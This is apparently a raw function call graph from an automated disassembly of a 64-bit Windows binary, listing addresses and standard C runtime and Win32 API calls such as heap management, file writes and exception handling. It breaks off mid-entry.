DecodePointer 18213->18219 18221 7fef9d2bd1f GetLastError 18213->18221 18216 7fef9d2abb0 _callnewh DecodePointer 18214->18216 18215->18213 18216->18220 18218 7fef9d2bcee GetLastError 18217->18218 18217->18220 18218->18220 18219->18213 18220->18196 18221->18220 18225 7fef9d2ba76 18222->18225 18223 7fef9d2bb07 18226 7fef9d2bb32 HeapSize HeapReAlloc 18223->18226 18230 7fef9d2bb00 _get_errno_from_oserr 18223->18230 18224 7fef9d2bacc 18227 7fef9d2bd70 _invalid_parameter 17 API calls 18224->18227 18225->18223 18225->18224 18228 7fef9d2bb74 18226->18228 18226->18230 18227->18230 18229 7fef9d2bba0 GetLastError 18228->18229 18239 7fef9d2bbd0 HeapQueryInformation 18228->18239 18229->18230 18230->18204 18234 7fef9d2ac4d 18233->18234 18236 7fef9d2ac0a 18233->18236 18235 7fef9d2abb0 _callnewh DecodePointer 18234->18235 18237 7fef9d2ac21 18235->18237 18236->18237 18238 7fef9d2abb0 _callnewh DecodePointer 18236->18238 18237->18220 18238->18236 18240 7fef9d2bb90 18239->18240 18240->18229 18240->18230 18704 7fef9d39aeb 18705 7fef9d39b2c 18704->18705 18706 7fef9d39b18 18704->18706 18708 7fef9d3ab10 17 API calls 18705->18708 18707 7fef9d39520 19 API calls 18706->18707 18707->18705 18714 7fef9d39b38 18708->18714 18709 7fef9d39c04 18710 7fef9d3a1cb 18709->18710 18711 7fef9d39c23 GetConsoleCP 18709->18711 18712 7fef9d3a205 18710->18712 18713 7fef9d3a8ad WriteFile 18710->18713 18734 7fef9d39c4d 18711->18734 18716 7fef9d3a400 18712->18716 18717 7fef9d3a21a 18712->18717 18715 7fef9d3a923 GetLastError 18713->18715 18730 7fef9d39dd9 _dosmaperr __doserrno 18713->18730 18714->18709 18718 7fef9d39bae GetConsoleMode 18714->18718 18715->18730 18727 7fef9d3a40e 18716->18727 18738 7fef9d3a5f3 18716->18738 18719 7fef9d3a33e WriteFile 18717->18719 18717->18730 18718->18709 18719->18717 18724 7fef9d3a3ea GetLastError 18719->18724 18720 7fef9d23280 __GSHandlerCheck 8 API calls 18725 7fef9d3a9f5 18720->18725 18721 7fef9d3a531 WriteFile 18726 7fef9d3a5dd GetLastError 18721->18726 18721->18727 18722 7fef9d39f66 WideCharToMultiByte 18728 7fef9d39fbf WriteFile 18722->18728 18722->18730 18723 7fef9d3a726 WideCharToMultiByte 18729 7fef9d3a791 GetLastError 18723->18729 18723->18738 18724->18730 18726->18730 18727->18721 18727->18730 18731 7fef9d3a050 GetLastError 18728->18731 18728->18734 18729->18730 18730->18720 18731->18730 18732 7fef9d3a7b0 WriteFile 18735 7fef9d3a857 GetLastError 18732->18735 18732->18738 18733 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18733->18734 18734->18722 18734->18730 18734->18733 18736 7fef9d3a158 GetLastError 18734->18736 18737 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18734->18737 18739 7fef9d3a06d WriteFile 18734->18739 18741 7fef9d3a1b5 GetLastError 18734->18741 18735->18738 18736->18730 18737->18734 18738->18723 18738->18730 18738->18732 18739->18734 18740 7fef9d3a103 GetLastError 18739->18740 18740->18730 18741->18730 17618 7fef9d270e6 17619 7fef9d27090 _exit 33 API calls 17618->17619 17620 7fef9d270f0 17619->17620 17170 7fef9d291ea 17171 7fef9d291ef 17170->17171 17172 7fef9d274e0 __crtExitProcess 3 API calls 17171->17172 17173 7fef9d29203 17172->17173 17174 7fef9d375e9 17175 7fef9d375f4 17174->17175 17178 7fef9d375fb 17174->17178 17176 7fef9d23280 __GSHandlerCheck 8 API calls 17175->17176 17177 7fef9d37d85 17176->17177 17179 7fef9d2bd70 _invalid_parameter 17 API calls 17178->17179 17179->17175 17631 7fef9d2d0ea 17632 7fef9d2d0ef 17631->17632 17633 7fef9d27090 _exit 33 API calls 17632->17633 17634 7fef9d2d209 17632->17634 17637 7fef9d2d0fc 17632->17637 17633->17634 17636 7fef9d2d289 17634->17636 17639 7fef9d23d00 RtlEncodePointer 17634->17639 17636->17637 17640 7fef9d29360 LeaveCriticalSection 17636->17640 17639->17636 17640->17637 17180 7fef9d25991 17181 7fef9d25996 _calloc_dbg_impl 17180->17181 17184 7fef9d2c020 17181->17184 17183 7fef9d259d5 17185 7fef9d2c03b HeapFree 17184->17185 17187 7fef9d2c039 _get_errno_from_oserr 17184->17187 17186 7fef9d2c05a GetLastError 17185->17186 17185->17187 17186->17187 17187->17183 17188 7fef9d2c990 17192 7fef9d24980 17188->17192 17190 7fef9d2c9b8 EncodePointer 17191 7fef9d2c9e5 17190->17191 17193 7fef9d249cb _calloc_dbg_impl 17192->17193 17193->17190 18241 7fef9d35393 18242 7fef9d353a0 18241->18242 18243 7fef9d353cc 18242->18243 18245 7fef9d353b4 __SehTransFilter 18242->18245 18251 7fef9d354a0 RaiseException 18243->18251 18250 7fef9d354a0 RaiseException 18245->18250 18246 7fef9d353ca 18248 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18246->18248 18249 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18248->18249 18250->18246 18251->18246 18769 7fef9d34a95 18771 7fef9d34aad __SehTransFilter 18769->18771 18770 7fef9d34c2b 18771->18770 18772 7fef9d35180 __SehTransFilter 38 API calls 18771->18772 18772->18770 18773 7fef9d32695 18774 7fef9d326a0 18773->18774 18775 7fef9d2bd70 _invalid_parameter 17 API calls 18774->18775 18776 7fef9d326ab 18774->18776 18775->18776 16447 7fef9d23599 16450 7fef9d28900 16447->16450 16449 7fef9d2359e 16451 7fef9d28920 16450->16451 16452 7fef9d28936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16450->16452 16451->16449 16453 7fef9d289de 16452->16453 16453->16451 16454 7fef9d24399 16455 7fef9d243a6 16454->16455 16457 7fef9d24377 16454->16457 16457->16454 16457->16455 16458 7fef9d2abb0 DecodePointer 16457->16458 16459 7fef9d2abd3 16458->16459 16459->16457 17652 7fef9d2c080 HeapValidate 17653 7fef9d2c0a2 17652->17653 17212 7fef9d3b580 17213 7fef9d3b5fa 17212->17213 17214 7fef9d3b6cb 17213->17214 17215 7fef9d3b676 17213->17215 17216 7fef9d3afb0 _fflush_nolock 17 API calls 17214->17216 17218 7fef9d3b6fe 17214->17218 17217 7fef9d2bd70 _invalid_parameter 17 API calls 17215->17217 17216->17218 17224 7fef9d3b6aa _LocaleUpdate::~_LocaleUpdate 17217->17224 17219 7fef9d3b84d 17218->17219 17220 7fef9d3b8a2 17218->17220 17221 7fef9d2bd70 _invalid_parameter 17 API calls 17219->17221 17222 7fef9d3b915 17220->17222 17229 7fef9d3b96a 17220->17229 17221->17224 17226 7fef9d2bd70 _invalid_parameter 17 API calls 17222->17226 17223 7fef9d23280 __GSHandlerCheck 8 API calls 17225 7fef9d3cd90 17223->17225 17224->17223 17226->17224 17227 7fef9d3cc93 17227->17224 17228 7fef9d2bd70 _invalid_parameter 17 API calls 17227->17228 17228->17224 17229->17227 17230 7fef9d3bada 17229->17230 17231 7fef9d2bd70 _invalid_parameter 17 API calls 17230->17231 17231->17224 18256 7fef9d3df8d 18257 7fef9d3dfbb 18256->18257 18258 7fef9d3eadf 18257->18258 18259 7fef9d3eec0 25 API calls 18257->18259 18267 7fef9d3da75 18257->18267 18260 7fef9d3ef10 25 API calls 18258->18260 18259->18258 18261 7fef9d3eafd 18260->18261 18262 7fef9d3eb33 18261->18262 18266 7fef9d3eec0 25 API calls 18261->18266 18263 7fef9d3ec29 18262->18263 18277 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18262->18277 18264 7fef9d3ebda 18263->18264 18265 7fef9d3ef10 25 API calls 18263->18265 18264->18267 18270 7fef9d3eec0 25 API calls 18264->18270 18265->18264 18266->18262 18268 7fef9d3eca1 18267->18268 18273 7fef9d3dbb5 18267->18273 18269 7fef9d2bd70 _invalid_parameter 17 API calls 18268->18269 18271 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18268->18271 18269->18271 18270->18267 18272 7fef9d23280 __GSHandlerCheck 8 API calls 18271->18272 18274 7fef9d3ed9e 18272->18274 18276 7fef9d2bd70 _invalid_parameter 17 API calls 18273->18276 18275 7fef9d3f000 wcsxfrm 2 API calls 18275->18277 18276->18271 18277->18264 18277->18275 18278 7fef9d3ee40 25 API calls 18277->18278 18278->18277 17654 7fef9d210b0 17656 7fef9d210da 17654->17656 17655 7fef9d210fc 17658 7fef9d23280 __GSHandlerCheck 8 API calls 17655->17658 17656->17655 17657 7fef9d21000 4 API calls 17656->17657 17657->17655 17659 7fef9d2112c 17658->17659 18279 7fef9d39fba 18288 7fef9d39c4d 18279->18288 18280 7fef9d3a06d WriteFile 18281 7fef9d3a103 GetLastError 18280->18281 18280->18288 18285 7fef9d39dd9 _dosmaperr __doserrno 18281->18285 18282 7fef9d23280 __GSHandlerCheck 8 API calls 18284 7fef9d3a9f5 18282->18284 18283 7fef9d39f66 WideCharToMultiByte 18283->18285 18286 7fef9d39fbf WriteFile 18283->18286 18285->18282 18287 7fef9d3a050 GetLastError 18286->18287 18286->18288 18287->18285 18288->18280 18288->18283 18288->18285 18289 7fef9d3a158 GetLastError 18288->18289 18290 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18288->18290 18291 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18288->18291 18292 7fef9d3a1b5 GetLastError 18288->18292 18289->18285 18290->18288 18291->18288 18292->18285 17660 7fef9d3bcbd 17661 7fef9d3b99c 17660->17661 17662 7fef9d3cc93 17661->17662 17666 7fef9d3bada 17661->17666 17663 7fef9d2bd70 _invalid_parameter 17 API calls 17662->17663 17664 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17662->17664 17663->17664 17665 7fef9d23280 __GSHandlerCheck 8 API calls 17664->17665 17667 7fef9d3cd90 17665->17667 17668 7fef9d2bd70 _invalid_parameter 17 API calls 17666->17668 17668->17664 17258 7fef9d3c1a3 17268 7fef9d3c1b0 get_int64_arg 17258->17268 17259 7fef9d3b99c 17260 7fef9d3cc93 17259->17260 17265 7fef9d3bada 17259->17265 17261 7fef9d2bd70 _invalid_parameter 17 API calls 17260->17261 17263 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17260->17263 17261->17263 17264 7fef9d23280 __GSHandlerCheck 8 API calls 17263->17264 17266 7fef9d3cd90 17264->17266 17267 7fef9d2bd70 _invalid_parameter 17 API calls 17265->17267 17267->17263 17268->17259 17269 7fef9d3b530 17268->17269 17272 7fef9d3b090 17269->17272 17271 7fef9d3b56c 17271->17268 17273 7fef9d3b0b7 17272->17273 17274 7fef9d3b168 17273->17274 17276 7fef9d3b1a6 _CrtMemDumpAllObjectsSince 17273->17276 17277 7fef9d3b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17273->17277 17275 7fef9d2bd70 _invalid_parameter 17 API calls 17274->17275 17275->17277 17278 7fef9d3b347 _CrtMemDumpAllObjectsSince 17276->17278 17282 7fef9d3b1cf 17276->17282 17277->17271 17279 7fef9d3b359 WideCharToMultiByte 17278->17279 17280 7fef9d3b3ab 17279->17280 17280->17277 17281 7fef9d3b3c1 GetLastError 17280->17281 17281->17277 17284 7fef9d3b3d0 _calloc_dbg_impl 17281->17284 17282->17277 17283 7fef9d2bd70 _invalid_parameter 17 API calls 17282->17283 17283->17277 17284->17277 17285 7fef9d2bd70 _invalid_parameter 17 API calls 17284->17285 17285->17277 17673 7fef9d3809f 17674 7fef9d380b0 _calloc_dbg_impl 17673->17674 17675 7fef9d38145 _calloc_dbg_impl 17673->17675 17675->17674 17676 7fef9d2bd70 _invalid_parameter 17 API calls 17675->17676 17676->17674 17677 7fef9d32c9f 17678 7fef9d32ca6 17677->17678 17680 7fef9d32caf 17677->17680 17679 7fef9d2bd70 _invalid_parameter 17 API calls 17678->17679 17678->17680 17679->17680 17681 7fef9d3d4a0 17682 7fef9d3d4b7 std::bad_exception::~bad_exception 17681->17682 17683 7fef9d3d4cc 17682->17683 17684 7fef9d3d710 _Ref_count LeaveCriticalSection 17682->17684 17684->17683 18293 7fef9d3a7a0 18298 7fef9d3a61f 18293->18298 18294 7fef9d3a726 WideCharToMultiByte 18295 7fef9d3a791 GetLastError 18294->18295 18294->18298 18301 7fef9d3a887 _dosmaperr __doserrno 18295->18301 18296 7fef9d3a7b0 WriteFile 18296->18298 18299 7fef9d3a857 GetLastError 18296->18299 18297 7fef9d23280 __GSHandlerCheck 8 API calls 18300 7fef9d3a9f5 18297->18300 18298->18294 18298->18296 18298->18301 18299->18298 18301->18297 16639 7fef9d2aca8 16640 7fef9d2acb2 16639->16640 16641 7fef9d274e0 __crtExitProcess 3 API calls 16640->16641 16642 7fef9d2acbc RtlAllocateHeap 16641->16642 17689 7fef9d25cad 17692 7fef9d25cb8 17689->17692 17691 7fef9d26201 17693 7fef9d25e1a _realloc_dbg 17692->17693 17694 7fef9d29360 LeaveCriticalSection 17692->17694 17694->17691 18314 7fef9d23faa 18315 7fef9d23e30 LeaveCriticalSection 18314->18315 18316 7fef9d23fb6 GetCurrentThreadId 18315->18316 18317 7fef9d23fea SetLastError 18316->18317 18318 7fef9d2cb4f 18323 7fef9d2cb5c 18318->18323 18319 7fef9d23280 __GSHandlerCheck 8 API calls 18320 7fef9d2cf0f 18319->18320 18321 7fef9d2cbeb GetStdHandle 18322 7fef9d2cc94 18321->18322 18325 7fef9d2cc07 std::exception::_Copy_str 18321->18325 18322->18319 18323->18321 18323->18322 18324 7fef9d2cc99 18323->18324 18324->18322 18326 7fef9d31640 17 API calls 18324->18326 18325->18322 18327 7fef9d2cc73 WriteFile 18325->18327 18328 7fef9d2cd10 18326->18328 18327->18322 18329 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18328->18329 18330 7fef9d2cd3d GetModuleFileNameW 18329->18330 18331 7fef9d2cdb1 18330->18331 18332 7fef9d2cd68 18330->18332 18335 7fef9d2ce5e 18331->18335 18347 7fef9d33380 18331->18347 18333 7fef9d31640 17 API calls 18332->18333 18334 7fef9d2cd84 18333->18334 18336 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18334->18336 18337 7fef9d32d80 17 API calls 18335->18337 18336->18331 18338 7fef9d2ce76 18337->18338 18340 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18338->18340 18342 7fef9d2cea3 18340->18342 18341 7fef9d2ce31 18343 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18341->18343 18344 7fef9d32d80 17 API calls 18342->18344 18343->18335 18345 7fef9d2ceb9 18344->18345 18346 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18345->18346 18346->18322 18349 7fef9d333a6 18347->18349 18348 7fef9d3342f 18350 7fef9d2bd70 _invalid_parameter 17 API calls 18348->18350 18349->18348 18351 7fef9d3346d _calloc_dbg_impl 18349->18351 18355 7fef9d333bc _calloc_dbg_impl 18349->18355 18350->18355 18352 7fef9d335fb 18351->18352 18353 7fef9d33639 _calloc_dbg_impl 18351->18353 18351->18355 18354 7fef9d2bd70 _invalid_parameter 17 API calls 18352->18354 18353->18355 18356 7fef9d2bd70 _invalid_parameter 17 API calls 18353->18356 18354->18355 18355->18341 18356->18355 17704 7fef9d25854 17705 7fef9d2585b _calloc_dbg_impl 17704->17705 17706 7fef9d2c020 _free_base 2 API calls 17705->17706 17707 7fef9d259d5 17706->17707 17286 7fef9d40550 17287 7fef9d40575 17286->17287 17288 7fef9d4055e 17286->17288 17288->17287 17289 7fef9d40568 CloseHandle 17288->17289 17289->17287 18794 7fef9d3465b 18804 7fef9d3445a __SehTransFilter 18794->18804 18795 7fef9d347d7 18796 7fef9d3485b 18795->18796 18797 7fef9d2cf80 _inconsistency 36 API calls 18795->18797 18797->18796 18798 7fef9d3466c __SehTransFilter 18798->18795 18799 7fef9d35bb0 __SehTransFilter 36 API calls 18798->18799 18800 7fef9d34727 18799->18800 18800->18795 18801 7fef9d2e500 __GetUnwindTryBlock 37 API calls 18800->18801 18802 7fef9d34767 18801->18802 18803 7fef9d2edc0 __SehTransFilter 9 API calls 18802->18803 18803->18795 18804->18798 18805 7fef9d35180 __SehTransFilter 38 API calls 18804->18805 18805->18804 17290 7fef9d3595c 17291 7fef9d2cf50 terminate 35 API calls 17290->17291 17292 7fef9d35961 17291->17292 17708 7fef9d2a057 17709 7fef9d2a061 17708->17709 17710 7fef9d2a234 17709->17710 17717 7fef9d2a08e __initmbctable 17709->17717 17712 7fef9d2a25d IsValidCodePage 17710->17712 17716 7fef9d2a22d __initmbctable 17710->17716 17711 7fef9d23280 __GSHandlerCheck 8 API calls 17713 7fef9d2a470 17711->17713 17714 7fef9d2a27b GetCPInfo 17712->17714 17712->17716 17715 7fef9d2a295 __initmbctable 17714->17715 17714->17716 17719 7fef9d2a5e0 __initmbctable 19 API calls 17715->17719 17716->17711 17718 7fef9d2a5e0 __initmbctable 19 API calls 17717->17718 17718->17716 17719->17716 18384 7fef9d25357 18387 7fef9d29360 LeaveCriticalSection 18384->18387 18386 7fef9d25361 18387->18386 17725 7fef9d2405b 17727 7fef9d2406e 17725->17727 17731 7fef9d29360 LeaveCriticalSection 17727->17731 17729 7fef9d24224 17730 7fef9d241bb _updatetlocinfoEx_nolock 17732 7fef9d29360 LeaveCriticalSection 17730->17732 17731->17730 17732->17729 17293 7fef9d2e55a 17294 7fef9d2e564 17293->17294 17295 7fef9d2e5c2 RtlLookupFunctionEntry 17294->17295 17296 7fef9d2e601 17294->17296 17295->17296 18806 7fef9d2425a FlsGetValue FlsSetValue 18807 7fef9d24283 18806->18807 16582 7fef9d27640 GetStartupInfoW 16583 7fef9d27676 _calloc_dbg 16582->16583 16584 7fef9d27ab9 16583->16584 16592 7fef9d27689 16583->16592 16593 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16583->16593 16594 7fef9d27a19 GetFileType 16583->16594 16585 7fef9d27ce0 SetHandleCount 16584->16585 16586 7fef9d27c7b 16584->16586 16587 7fef9d27b95 GetStdHandle 16584->16587 16585->16592 16586->16585 16587->16586 16588 7fef9d27bb9 16587->16588 16588->16586 16589 7fef9d27bc8 GetFileType 16588->16589 16589->16586 16590 7fef9d27beb InitializeCriticalSectionAndSpinCount 16589->16590 16590->16586 16590->16592 16593->16584 16593->16592 16594->16584 16594->16593 17297 7fef9d21140 17298 7fef9d2116a 17297->17298 17299 7fef9d2118c 17298->17299 17300 7fef9d2119a FileTimeToSystemTime 17298->17300 17302 7fef9d23280 __GSHandlerCheck 8 API calls 17299->17302 17300->17299 17301 7fef9d211ae 17300->17301 17305 7fef9d21000 GetThreadLocale GetDateFormatA 17301->17305 17304 7fef9d211d0 17302->17304 17306 7fef9d21062 GetThreadLocale GetTimeFormatA 17305->17306 17307 7fef9d2105b 17305->17307 17306->17307 17307->17299 17733 7fef9d28040 17734 7fef9d28056 17733->17734 17735 7fef9d2805b GetModuleFileNameA 17733->17735 17736 7fef9d2aa40 __initmbctable 24 API calls 17734->17736 17737 7fef9d28083 17735->17737 17736->17735 18808 7fef9d29240 18809 7fef9d2925f 18808->18809 18810 7fef9d2924d 18808->18810 18811 7fef9d29281 InitializeCriticalSectionAndSpinCount 18809->18811 18812 7fef9d29295 18809->18812 18811->18812 18814 7fef9d29360 LeaveCriticalSection 18812->18814 18814->18810 18815 7fef9d2ae40 18816 7fef9d2d490 std::exception::_Copy_str 17 API calls 18815->18816 18817 7fef9d2ae59 18816->18817 18818 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18817->18818 18819 7fef9d2ae86 std::exception::_Copy_str 18818->18819 18820 7fef9d30fd0 17 API calls 18819->18820 18823 7fef9d2af3a std::exception::_Copy_str 18819->18823 18821 7fef9d2af0d 18820->18821 18822 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18821->18822 18822->18823 18824 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18823->18824 18826 7fef9d2b2e0 18823->18826 18824->18826 18825 7fef9d2b33e 18828 7fef9d30cc0 25 API calls 18825->18828 18826->18825 18827 7fef9d2d490 std::exception::_Copy_str 17 API calls 18826->18827 18829 7fef9d2b311 18827->18829 18830 7fef9d2b358 18828->18830 18831 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18829->18831 18832 7fef9d2b37d 18830->18832 18833 7fef9d2cff0 terminate 34 API calls 18830->18833 18831->18825 18835 7fef9d23280 __GSHandlerCheck 8 API calls 18832->18835 18834 7fef9d2b373 18833->18834 18836 7fef9d27090 _exit 33 API calls 18834->18836 18837 7fef9d2b3a0 18835->18837 18836->18832 17308 7fef9d3f53e 17309 7fef9d3f55c 17308->17309 17310 7fef9d3f74d 17309->17310 17314 7fef9d40170 17309->17314 17312 7fef9d23280 __GSHandlerCheck 8 API calls 17310->17312 17313 7fef9d3f7c5 17312->17313 17315 7fef9d40185 17314->17315 17316 7fef9d3afb0 _fflush_nolock 17 API calls 17315->17316 17317 7fef9d401c7 17316->17317 17318 7fef9d401dc 17317->17318 17319 7fef9d3ab10 17 API calls 17317->17319 17320 7fef9d40326 17317->17320 17318->17310 17319->17320 17320->17318 17321 7fef9d39290 23 API calls 17320->17321 17321->17318 17738 7fef9d41040 17741 7fef9d2e8f0 17738->17741 17740 7fef9d4108f 17742 7fef9d2e90d 17741->17742 17745 7fef9d33cc0 17742->17745 17744 7fef9d2e980 17744->17740 17746 7fef9d33cdd 17745->17746 17748 7fef9d33d82 17746->17748 17749 7fef9d33ef3 __SehTransFilter 17746->17749 17759 7fef9d33d62 17746->17759 17750 7fef9d33dc8 17748->17750 17753 7fef9d33e40 17748->17753 17748->17759 17749->17759 17763 7fef9d340b0 17749->17763 17752 7fef9d33a60 __StateFromControlPc 36 API calls 17750->17752 17751 7fef9d2e790 __SehTransFilter 37 API calls 17751->17759 17756 7fef9d33dec 17752->17756 17754 7fef9d33e93 17753->17754 17755 7fef9d2cf80 _inconsistency 36 API calls 17753->17755 17762 7fef9d33ebd 17753->17762 17760 7fef9d34f20 __SehTransFilter 36 API calls 17754->17760 17755->17754 17757 7fef9d2cf80 _inconsistency 36 API calls 17756->17757 17758 7fef9d33e08 17756->17758 17757->17758 17761 7fef9d34f20 __SehTransFilter 36 API calls 17758->17761 17759->17744 17760->17762 17761->17759 17762->17751 17762->17759 17764 7fef9d33b40 __StateFromControlPc 36 API calls 17763->17764 17765 7fef9d340ea 17764->17765 17766 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17765->17766 17767 7fef9d34110 17766->17767 17808 7fef9d33c70 17767->17808 17770 7fef9d34133 __SetState 17811 7fef9d33c00 17770->17811 17771 7fef9d34176 17772 7fef9d33c70 __GetUnwindTryBlock 37 API calls 17771->17772 17773 7fef9d34174 17772->17773 17775 7fef9d2cf80 _inconsistency 36 API calls 17773->17775 17783 7fef9d341af _ValidateRead _SetThrowImageBase 17773->17783 17775->17783 17776 7fef9d347d9 17778 7fef9d347f3 17776->17778 17779 7fef9d34847 17776->17779 17786 7fef9d347d7 17776->17786 17777 7fef9d34347 17777->17776 17780 7fef9d343f5 17777->17780 17825 7fef9d34960 17778->17825 17782 7fef9d2cf50 terminate 35 API calls 17779->17782 17788 7fef9d3466c __SehTransFilter 17780->17788 17820 7fef9d2ea30 17780->17820 17782->17786 17783->17777 17785 7fef9d34235 17783->17785 17793 7fef9d2cf80 _inconsistency 36 API calls 17783->17793 17795 7fef9d3428e 17783->17795 17785->17759 17786->17785 17787 7fef9d2cf80 _inconsistency 36 API calls 17786->17787 17787->17785 17788->17786 17789 7fef9d35bb0 __SehTransFilter 36 API calls 17788->17789 17790 7fef9d34727 17789->17790 17790->17786 17791 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17790->17791 17792 7fef9d34767 17791->17792 17794 7fef9d2edc0 __SehTransFilter 9 API calls 17792->17794 17793->17795 17794->17786 17796 7fef9d2cf80 _inconsistency 36 API calls 17795->17796 17798 7fef9d342fa 17795->17798 17796->17798 17797 7fef9d34450 __SehTransFilter 17797->17788 17800 7fef9d35180 __SehTransFilter 38 API calls 17797->17800 17798->17777 17799 7fef9d35bb0 __SehTransFilter 36 API calls 17798->17799 17801 7fef9d34340 __SehTransFilter 17799->17801 17800->17797 17801->17777 17802 7fef9d34393 17801->17802 17803 7fef9d3435a __SehTransFilter 17801->17803 17804 7fef9d2cf50 terminate 35 API calls 17802->17804 17814 7fef9d34870 17803->17814 17804->17777 17809 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17808->17809 17810 7fef9d33c9c 17809->17810 17810->17770 17810->17771 17812 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17811->17812 17813 7fef9d33c31 17812->17813 17813->17773 17835 7fef9d3d4e0 17814->17835 17817 7fef9d3d320 17818 7fef9d3d375 17817->17818 17819 7fef9d3d3ba RaiseException 17818->17819 17819->17777 17821 7fef9d33b40 __StateFromControlPc 36 API calls 17820->17821 17822 7fef9d2ea6f 17821->17822 17823 7fef9d2cf80 _inconsistency 36 API calls 17822->17823 17824 7fef9d2ea7a 17822->17824 17823->17824 17824->17797 17827 7fef9d34990 17825->17827 17832 7fef9d3498b 17825->17832 17826 7fef9d349b2 __SehTransFilter 17828 7fef9d34a41 17826->17828 17829 7fef9d2cf80 _inconsistency 36 API calls 17826->17829 17826->17832 17827->17826 17838 7fef9d23d00 RtlEncodePointer 17827->17838 17830 7fef9d2ea30 __SehTransFilter 36 API calls 17828->17830 17829->17828 17833 7fef9d34a8e __SehTransFilter 17830->17833 17832->17786 17833->17832 17834 7fef9d35180 __SehTransFilter 38 API calls 17833->17834 17834->17832 17836 7fef9d3d660 std::exception::_Copy_str 17 API calls 17835->17836 17837 7fef9d3437d 17836->17837 17837->17817 17838->17826 17839 7fef9d3dc41 17840 7fef9d3ee40 25 API calls 17839->17840 17842 7fef9d3da75 17840->17842 17841 7fef9d3eca1 17843 7fef9d2bd70 _invalid_parameter 17 API calls 17841->17843 17844 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17841->17844 17842->17841 17846 7fef9d3dbb5 17842->17846 17843->17844 17845 7fef9d23280 __GSHandlerCheck 8 API calls 17844->17845 17847 7fef9d3ed9e 17845->17847 17848 7fef9d2bd70 _invalid_parameter 17 API calls 17846->17848 17848->17844 18838 7fef9d40e40 18839 7fef9d40e5e 18838->18839 18840 7fef9d40e50 18838->18840 18840->18839 18841 7fef9d23e00 3 API calls 18840->18841 18841->18839 17849 7fef9d2d04a 17850 7fef9d2d1d8 DecodePointer 17849->17850 17851 7fef9d2d1e8 17850->17851 17852 7fef9d27090 _exit 33 API calls 17851->17852 17853 7fef9d2d209 17851->17853 17857 7fef9d2d1f0 17851->17857 17852->17853 17855 7fef9d2d289 17853->17855 17858 7fef9d23d00 RtlEncodePointer 17853->17858 17855->17857 17859 7fef9d29360 LeaveCriticalSection 17855->17859 17858->17855 17859->17857 16193 7fef9d23471 16194 7fef9d2347a 16193->16194 16203 7fef9d234bc 16193->16203 16195 7fef9d23496 16194->16195 16205 7fef9d270b0 16194->16205 16208 7fef9d27d00 16195->16208 16202 7fef9d234a5 16202->16203 16204 7fef9d23e00 3 API calls 16202->16204 16204->16203 16218 7fef9d27280 16205->16218 16210 7fef9d27d0e 16208->16210 16209 7fef9d2349b 16212 7fef9d23e00 16209->16212 16210->16209 16211 7fef9d27d87 DeleteCriticalSection 16210->16211 16211->16210 16213 7fef9d23e23 16212->16213 16214 7fef9d23e0d FlsFree 16212->16214 16378 7fef9d290b0 16213->16378 16214->16213 16217 7fef9d288d0 HeapDestroy 16217->16202 16219 7fef9d27296 _exit 16218->16219 16220 7fef9d272c7 RtlDecodePointer 16219->16220 16230 7fef9d27368 _initterm 16219->16230 16239 7fef9d2744e 16219->16239 16221 7fef9d272e5 DecodePointer 16220->16221 16220->16230 16235 7fef9d27314 16221->16235 16223 7fef9d270c3 16223->16195 16224 7fef9d2745e 16224->16223 16225 7fef9d27520 _exit LeaveCriticalSection 16224->16225 16226 7fef9d27479 16225->16226 16265 7fef9d274e0 16226->16265 16230->16239 16242 7fef9d26210 16230->16242 16231 7fef9d2736d DecodePointer 16241 7fef9d23d00 RtlEncodePointer 16231->16241 16235->16230 16235->16231 16238 7fef9d27391 DecodePointer DecodePointer 16235->16238 16240 7fef9d23d00 RtlEncodePointer 16235->16240 16236 7fef9d27449 16255 7fef9d26f10 16236->16255 16238->16235 16239->16224 16262 7fef9d27520 16239->16262 16240->16235 16241->16235 16243 7fef9d26229 16242->16243 16244 7fef9d2628f 16243->16244 16245 7fef9d262cb 16243->16245 16268 7fef9d2bd70 DecodePointer 16244->16268 16272 7fef9d29360 LeaveCriticalSection 16245->16272 16248 7fef9d262c3 16248->16239 16249 7fef9d27100 16248->16249 16250 7fef9d27112 16249->16250 16251 7fef9d271e4 DecodePointer 16250->16251 16252 7fef9d271fe 16251->16252 16297 7fef9d23d00 RtlEncodePointer 16252->16297 16254 7fef9d27219 16254->16236 16298 7fef9d263e0 16255->16298 16257 7fef9d26f33 16258 7fef9d26f8e 16257->16258 16306 7fef9d26660 16257->16306 16260 7fef9d23280 __GSHandlerCheck 8 API calls 16258->16260 16261 7fef9d26fa7 16260->16261 16261->16239 16374 7fef9d29360 LeaveCriticalSection 16262->16374 16264 7fef9d2752e 16264->16224 16375 7fef9d27490 GetModuleHandleW 16265->16375 16269 7fef9d2bdd0 16268->16269 16270 7fef9d2bdac 16268->16270 16273 7fef9d2be00 16269->16273 16270->16248 16272->16248 16276 7fef9d2be50 16273->16276 16277 7fef9d2be81 terminate 16276->16277 16278 7fef9d2be8d RtlCaptureContext RtlLookupFunctionEntry 16276->16278 16277->16278 16279 7fef9d2bf64 16278->16279 16280 7fef9d2bf1c RtlVirtualUnwind 16278->16280 16281 